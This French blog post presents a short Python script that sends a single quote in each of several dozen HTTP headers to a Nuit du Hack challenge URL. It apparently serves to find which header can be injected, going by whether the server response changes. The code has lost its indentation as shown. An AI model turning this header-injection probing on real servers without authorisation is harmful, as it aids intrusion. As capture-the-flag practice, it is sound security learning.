samedi 24 mars 2012

script test header injectable dans une requete http


import urllib2

headers = ['Accept','Accept-Charset','Accept-Encoding','Accept-Language','Accept-Datetime','Authorization','Cache-Control','Connection','Cookie','Content-MD5','Content-Type','Date','Expect','From','Host','If-Match','If-Modified-Since','If-None-Match','If-Range','If-Unmodified-Since','Max-Forwards','Pragma','Proxy-Authorization','Range','Referer','TE','Upgrade','User-Agent','Via','Warning','X-Requested-With','X-Do-Not-Track','DNT','X-Forwarded-For','X-ATT-DeviceId','X-Wap-Profile']

#skipped: Content-Length

req = urllib2.Request('http://sci.nuitduhack.com/EgZ8sv12')
for h in headers:
req.add_header(h, "'")
r = urllib2.urlopen(req)
if r.read()[0:4] == '.NDH':    # inscrire ici la chaine de caractère qui apparait dans la réponse du serveur
print h + ': rate'
else:
print 'Yesssssssssssssssssssss'

Aucun commentaire:

Enregistrer un commentaire

Enregistrer un commentaire